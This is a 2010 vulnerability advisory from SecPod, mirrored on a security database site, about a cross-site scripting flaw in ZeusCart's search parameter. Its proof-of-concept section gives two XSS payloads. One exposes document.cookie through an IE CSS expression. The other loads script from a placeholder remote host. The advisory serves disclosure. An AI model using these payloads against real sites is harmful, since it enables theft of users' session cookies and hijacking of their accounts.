Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24424
HistoryAug 08, 2010 - 12:00 a.m.

ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability

2010-08-0800:00:00
vulners.com
111
JSON

#######################################################################
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability

SecPod Technologies (www.secpod.com)
Author Sooraj K.S
#######################################################################

SecPod ID: 1003 07/28/2010 Issue Discovered
07/30/2010 Vendor Notified
No Response from Vendor

Class: Cross-Site Scripting Severity: Medium

Overview:

ZeusCart Ecommerce Shopping Cart Software is prone to cross-site scripting
vulnerability.

Technical Description:

ZeusCart Ecommerce Shopping Cart Software is prone to a cross-site scripting
vulnerability because it fails to properly sanitize user-supplied input.

Input passed via the 'search' parameter in a 'search' action in index.php is
not properly verified before it is returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site. This may allow the attacker to steal cookie-based
authentication credentials and to launch other attacks.

The vulnerability has been tested in ZeusCart 3.0 and 2.3. Other versions may
also be affected.

Impact:

Successful exploitation allows an attacker to execute arbitrary HTML and script
code in a user's browser session in the context of a vulnerable site.

Affected Software:

ZeusCart 3.0
ZeusCart 2.3

Tested on,
ZeusCart 3.0 and 2.3 (tested using Microsoft Internet Explorer browser)

Reference:

http://www.zeuscart.com/
http://secpod.org/blog/?p=109
http://secpod.org/advisories/SECPOD_ZeusCart_XSS.txt

Proof of Concept:

1)Input this code in search box and click search
'"%22%20style=x:expression(alert(document.cookie))><"
This script executed only on Microsoft Internet Explorer browser when tested
on ZeusCart 3.0 and 2.3

2) This example worked on ZeusCart version 2.3
http://www.example.com/?do=search&amp;search=&#39;&quot;&gt;&lt;SCRIPT SRC=//REMOTE_SITE_SCRIPT>

Solution:

Fix not available

Risk Factor:

CVSS Score Report: 
    ACCESS_VECTOR          = NETWORK
    ACCESS_COMPLEXITY      = MEDIUM
    AUTHENTICATION         = NONE
    CONFIDENTIALITY_IMPACT = NONE
    INTEGRITY_IMPACT       = PARTIAL
    AVAILABILITY_IMPACT    = NONE
    EXPLOITABILITY         = PROOF_OF_CONCEPT
    REMEDIATION_LEVEL      = UNAVAILABLE
    REPORT_CONFIDENCE      = CONFIRMED
    CVSS Base Score        = 4.3 &#40;MEDIUM&#41; &#40;AV:N/AC:M/Au:N/C:N/I:P/A:N&#41;

Credits:

Sooraj K.S of SecPod Technologies has been credited with the discovery of this
vulnerability.

JSON